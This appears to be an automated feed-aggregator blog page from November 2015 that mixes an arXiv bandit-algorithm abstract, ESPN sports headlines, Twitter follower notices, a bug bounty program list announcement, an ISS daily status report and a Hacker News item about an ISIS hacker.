In this paper, we present a simple and efficient Context-Aware Bandit (CAB) algorithm. With CAB we attempt to craft a bandit algorithm that can capture collaborative effects and that can be easily deployed in a real-world recommendation system, where the multi-armed bandits have been shown to perform well in particular with respect to the cold-start problem. CAB utilizes a context-aware clustering technique augmenting exploration-exploitation strategies. CAB dynamically clusters the users based on the content universe under consideration. We provide a theoretical analysis in the standard stochastic multi-armed bandits setting. We demonstrate the efficiency of our approach on production and real-world datasets, showing the scalability and, more importantly, the significantly increased prediction performance against several existing state-of-the-art methods.



from cs.AI updates on arXiv.org http://ift.tt/1ZwXM9W
via IFTTT

Ravens: QB Jimmy Clausen claimed off waivers, worked with OC Marc Trestman in Chicago in 2014; Joe Flacco placed on IR (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

I have a new follower on Twitter


software video
Software per Video editing, codec, rip
Italy
http://t.co/iyXrcyGSPV
Following: 3503 - Followers: 1066

November 24, 2015 at 03:25PM via Twitter http://twitter.com/software_video

Ravens: Baltimore (3-7) drops 1 spot to No. 30 in Week 12 NFL power rankings; open here for full rankings (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

I have a new follower on Twitter


Maria Gonzalo
I am a sweet girl who love men and I enjoy it when I am looked after and given flowers. I love romantic walks under the moon and night swimming naked.


Following: 790 - Followers: 104

November 24, 2015 at 01:08PM via Twitter http://twitter.com/MariaGonzal21

Boston Briefing: Pats lose two more WRs; Danny Ainge talks Celts' season; Hanley Ramirez's winter plan; Bruins win in SO (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

[FD] List of Bug Bounty Programs INTERNATIONAL 427+ OFFICIAL - Bug Bounty Sheet

Title: List of Bug Bounty Programs INTERNATIONAL 427+ OFFICIAL - Bug Bounty Sheet Program Counts: Public (427+) & Silent (06) URL: http://ift.tt/1PLTNU7 Information: The "list of bug bounty" impact over 426+ international security programs world wide. Commercial programs like bug bounty or reward systems but also regular security acknowledgments. The table list provides 5 item categories. The first list shows the last 10 entries and the second list shows the full list of bug bounty programs Feel free to send us new updates and contribute to the public bug bounty-, security acknowledgment- or reward- programs list.

Source: Gmail -> IFTTT-> Blogger

I have a new follower on Twitter


Louise Webster



Following: 408 - Followers: 111

November 24, 2015 at 07:29AM via Twitter http://twitter.com/LouiseWebster22

ISS Daily Summary Report – 11/23/15

Microgravity Science Glovebox (MSG) Troubleshooting:  Kelly and Lindgren attempted to restore full functionality to the slide mechanism that allows the MSG work volume to be extended for crew access but were not successful.  The MSG Ground Team is working with a ground unit to develop additional procedures for correcting the problem.  The slide mechanism initially malfunctioned last Tuesday, November 17th.   EXPRESS (EXpedite the PRocessing of Experiments to Space Station) Rack 7 Laptop Software Load:  Yui supported the ongoing software updates to ISS EXPRESS Rack laptops by copying a software load to the EXPRESS Rack 7 laptop.  These software updates include enhanced security with the Windows 7 operating system, new features and support for new capabilities.   Biological Rhythms 48 Hours:  Lindgren donned the Holter Electrocardiogram to support JAXA’s Biological Rhythms 48 Hours investigation.  He then synchronized data between the Actiwatch and Holter.  This investigation studies the effects of long-term microgravity exposure on heart function by analyzing an astronaut’s electrocardiogram for 48 hours. While the ISS schedule follows Greenwich Mean Time (GMT), it is not known whether a separate biological rhythm is imposed on long-term flight crews. To study this, astronauts wear an Actiwatch for 96 hours and a Holter electrocardiograph for 48 hours.   Intracranial Pressure and Visual Impairment (IPVI):  For JAXA’s IPVI investigation, Lindgren took front and side photos of his face with a USB camera attached to the Medical Laptop.  He then participated in a conference with the ground to discuss any current medical conditions and upcoming IPVI operations.  Long-duration spaceflight may cause an elevation of intracranial pressure (ICP), resulting in changes in the optic nerve and ocular structure. The aim of this study is to non-invasively estimate the changes in intracranial pressure and brain circulation induced by long-duration spaceflights, by analyzing the arterial blood pressure and brain blood flow waveforms before and after space flight.  In addition, researchers hope to correlate the occurrence of abnormalities of the eye (e.g. optic disc edema) with ISS crewmembers experiencing an increase in intracranial pressure.   Veggie (Veg-01):  Kelly thinned seedlings today so that each Veg-01 Plant Pillow has one plant, and then refilled the pillows with water.  The Veg-01 investigation is used to assess on-orbit function and performance of the Veggie facility, focusing on the growth and development of seedlings in the spaceflight environment and the composition of microbial flora on the plants and the facility.  For this run, Zinnias will be grown for 60 days and are expected to produce flowers.   Story Time From Space:  Yui read “Atmospheres and Telescopes” from the book Max Goes to the Moon,” discussed the subject on camera, and demonstrated the scientific principles involved. Video recording of the activity will be downlinked to the ground and used for educational purposes.   Integrated Resistance and Aerobic Training Study (Sprint) Volume of Oxygen Utilized (VO2) Max:  For his Return minus 30 day (R-30) Sprint VO2 session, Yui attached Electrocardiogram (ECG) electrodes to himself, set up and donned Heart Rate Monitor hardware, performed Portable Pulmonary Function System calibrations, and then performed the VO2 protocol.  The Sprint VO2 investigation evaluates the use of high intensity, low volume exercise to minimize loss of muscle, bone, and cardiovascular function in ISS crewmembers while reducing total exercise time during long-duration space missions.   Fine Motor Skills:  Kelly completed a session of the Fine Motor Skills experiment.  During the experiment he performed a series of interactive tasks on a touchscreen tablet. This investigation is the first fine motor skills study to measure long-term microgravity exposure, different phases of microgravity adaptation, and sensorimotor recovery after returning to Earth gravity. Fine Motor Skills sessions completed by Kelly and Kornienko will provide data for identification of trends or variations in fine motor performance in microgravity over the duration of their year-long space mission and upon their return to earth.  Kelly’s results will also be compared with a closely matched participant on Earth.   Cygnus/Orbital ATK (OA)-4 Preps:  Kelly, Yui, and Lindgren participated in a conference with Robotics Ground Controllers to discuss rendezvous operations for the OA-4 flight.  Following the conference, the crew completed a procedure review and then Kelly and Lindgren performed a Computer Based Training session.   Russian Joint Research (RJR) Microbiological Sampling:  On Saturday, Kornienko used the Microbial Air Sampler (MAS) and Surface Sample Kit (SSK) to take surface and air samples in the ISS to support a microbiological assessment of the ISS.  These activities are performed as part of a joint cooperative research program between NASA and the Russian Space Agency. The results of incubation and analysis of these samples will be used to identify ISS locations and surfaces prone to microbial contamination and will provide a scientific basis for decisions about future microbial monitoring on ISS and on future spacecraft used for human exploration.   Cognition:  Lindgren performed his Flight Day 122 session of the Cognition experiment on Saturday.  The Individualized Real-Time Neurocognitive Assessment Toolkit for Space Flight Fatigue (Cognition) investigation is a battery of tests that measure how spaceflight-related physical changes, such as microgravity and lack of sleep, can affect cognitive performance. Cognition includes ten brief computerized tests that cover a wide range of cognitive functions, and provides immediate feedback on current and past test results. The software used allows for real-time measurement of cognitive performance while in space.   Journals:  Kelly completed a Journals entry on Saturday. The Journals investigation obtains information on behavioral and human issues that are relevant to the design of equipment and procedures used during astronauts during extended-duration missions. Study results provide information used in preparation for future missions to low-Earth orbit and beyond.   Water Processing Assembly (WPA) Fault:  Over the weekend on Saturday, WPA experienced a fault associated with the pre-heater in the Catalytic Reactor unit not staying above the required temperature.  Ground Teams assessed then modified temperature limits in order to allow WPA operations to continue, while longer term plans are discussed.   Today’s Planned Activities All activities were completed unless otherwise noted. Calf Volume Measurement IPVI – Photography […]

from ISS On-Orbit Status Report http://ift.tt/1lfD7Y3
via IFTTT

I have a new follower on Twitter


Sara Calderon



Following: 336 - Followers: 59

November 24, 2015 at 07:23AM via Twitter http://twitter.com/Sara19Calderon

I have a new follower on Twitter


Betty Young



Following: 821 - Followers: 123

November 24, 2015 at 07:18AM via Twitter http://twitter.com/Betty4Young

Hacker Claims He helped FBI Track Down ISIS Hacker (Who was killed in Drone-Strike)

Remember Junaid Hussain? Junaid Hussain – a hacker turned ISIS cyber mastermind who was killed in a US drone strike in August this year. But something has emerged what we don't know about the death of Hussain. The infamous hacker who in the past hacked the Anonymous pseudo-official Twitter accounts, now claims he served as an FBI informant to help the US government track down Junaid


from The Hacker News http://ift.tt/1Tc1W2A
via IFTTT

I have a new follower on Twitter


Norma Jones



Following: 387 - Followers: 108

November 24, 2015 at 07:05AM via Twitter http://twitter.com/NormaJones21

I have a new follower on Twitter


Eleana García



Following: 397 - Followers: 104

November 24, 2015 at 07:05AM via Twitter http://twitter.com/GarciaEleana20

I have a new follower on Twitter


Kathy Youmans



Following: 345 - Followers: 90

November 24, 2015 at 06:59AM via Twitter http://twitter.com/KathyYoumans21

I have a new follower on Twitter


Gloria Boolman



Following: 395 - Followers: 118

November 24, 2015 at 06:59AM via Twitter http://twitter.com/BoolmanGloria

I have a new follower on Twitter


Holly Gerald



Following: 421 - Followers: 98

November 24, 2015 at 06:45AM via Twitter http://twitter.com/HollyGerald

I have a new follower on Twitter


Paris Gilmore



Following: 673 - Followers: 87

November 24, 2015 at 06:33AM via Twitter http://twitter.com/ParisGilmore21

I have a new follower on Twitter


Susan Dyson



Following: 405 - Followers: 103

November 24, 2015 at 06:33AM via Twitter http://twitter.com/Susan21Dyson